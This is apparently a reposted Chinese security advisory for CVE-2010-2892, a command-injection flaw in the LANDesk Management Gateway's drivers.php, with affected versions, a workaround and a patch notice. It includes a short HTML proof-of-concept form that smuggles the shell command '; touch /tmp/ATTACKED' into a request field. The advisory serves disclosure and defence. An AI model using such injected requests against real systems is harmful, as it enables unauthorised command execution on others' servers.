LANDesk管理套件HTML表单请求命令注入漏洞

LANDesk管理套件HTML表单请求命令注入漏洞

发布日期:2010-11-09
更新日期:2010-11-11

受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s
不受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.62
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.62
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2010-2892

Landesk管理套件是一款网络管理系统,可控制桌面,服务器和移动设备等。

Landesk没有正确地验证提交特制请求的用户来源。如果管理员使用攻击者的浏览器登录到了设备,攻击者就可以以gsbadmin用户权限执行任意代码。

<*来源:Aureliano Calvo
 
  链接:?l=full-disclosure&m=128943189002312&w=2
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/-----
<head><title>LANDesk PoC</title></head>
  <body>
    <form method="post" action="https://[server]/gsb/drivers.php">
      <input type="text" value="; touch /tmp/ATTACKED">
      <input type="text" value="1">
      <input type="text" value="getupdate">
      <input type="submit" value="Attack!">
    </form>
  </body>
</html>
-----/

建议:
--------------------------------------------------------------------------------
临时解决方法:

1. 启动SSH控制台会话,或登录到LDMG控制台并启动终端会话。
2. 发布以下命令:mv/usr/LANDesk/broker/webroot/gsb/drivers.php ~

厂商补丁:

LANDesk Software
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwsdsp.html